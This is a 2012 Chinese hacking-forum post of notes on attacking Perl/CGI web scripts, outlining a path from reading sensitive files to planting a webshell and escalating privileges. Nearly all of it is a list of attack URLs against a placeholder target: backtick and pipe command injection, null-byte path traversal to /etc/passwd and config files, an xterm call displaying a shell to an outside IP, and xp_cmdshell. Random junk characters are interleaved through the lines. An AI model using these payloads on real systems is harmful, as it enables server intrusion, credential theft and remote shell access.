找回密码
 立即注册
查看: 2897|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着    f; _" v; Z+ G- X4 n3 m
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  7 o4 G  F1 J  u" ]6 z1 T. t! a, D
感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  
+ c" y" o/ y4 y+ S8 g0 _注“  $ |5 R% V  W9 v% _
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
. ?& L9 |+ X5 {/ J以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  
: w' C% Q6 u* p. r. u, u9 k7 h: t: a; o) [' G/ i
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  
8 g: ~# \2 `# k) R1 d4 ~' X( Uhttp://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  
7 u& s. ]$ u& f" O4 chttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  4 x- P3 q( s' {/ g; }
http://target.com/cgi-bin/home/news/sub.pl?`id`  
9 w$ ^9 }  D! R  g% thttp://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  
. M; r, U+ w5 ?  P- _http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  . [( f& _+ E) _; B7 G. X; r8 {9 P
8 K0 r! a7 M( n% W+ L* A1 ~! z
http://target.com/test.pl;ls|    o2 p0 Y! R' k& W
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
3 V! N0 d/ P5 k% d- `& A0 B, Bhttp://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  ) Y$ O! _3 I4 w0 u, p! E$ Y
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  9 r* w( R/ I* {
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  
* P2 J; e: M! Q/ Q* L- }: dhttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  % B/ I0 E% U2 K( l7 J9 e* _

# o9 M: C5 F% {& q5 L9 Dhttp://target.com/test.pl?&........ /../../etc/passwd  
+ E$ E: v  ?! `7 ~: t" \- R# p. \6 C+ m, q' E$ `/ @
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  
. J8 i" F8 `( t1 n- Ihttp://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  
2 ]) r9 u) c0 ?6 w6 |! Z5 t# n/ w6 j2 Ghttp://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  
3 d& Y! ^) p% h/ g
) m( I& |* n: ?  H4 Vhttp://www.target.org/show.php?f ... /include/config.php 查看php代码  # O6 R+ w5 s% V
http://www.target.org/show.php?f ... ng/admin/global.php  8 w7 u- m0 i! A
8 l. i3 I+ H( i8 Y% L: }1 g
emm和ps的一句话
8 P. N2 j" Y  C- u( R" t0 A( E
# L8 a5 z  j" phttp://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  # \" s* ^- Y) E6 B& N' ~  S
1 X, j( A& t% D/ u2 k, E
>bbb%20|  
' `: k1 g1 G# J' O+ ?( C+ k
# q0 c5 A- T* d4 G1 F$ Qhttp://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  
  u& G" ^' a3 r8 a; X& k, i% @2 u
7 W& G$ ^1 ]& [- d; x. u2 F& F7 Ihttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  . Z& @( p9 o3 O. U
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  
7 k  e7 ?$ j9 L* l& ^/ W% o/ g2 A1 }/ s9 [. E
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  ) g- X5 r6 s5 W7 T9 h! P
http://target.com/index.html#cmd.exe  4 \+ G" B" s! h. V3 B! N- d
http://target.com/index.html?dummyparam=xp_cmdshell  
2 A, U  Z7 P. a8 Slynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  2 N/ x7 [+ I+ P9 |) {+ r2 v+ ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表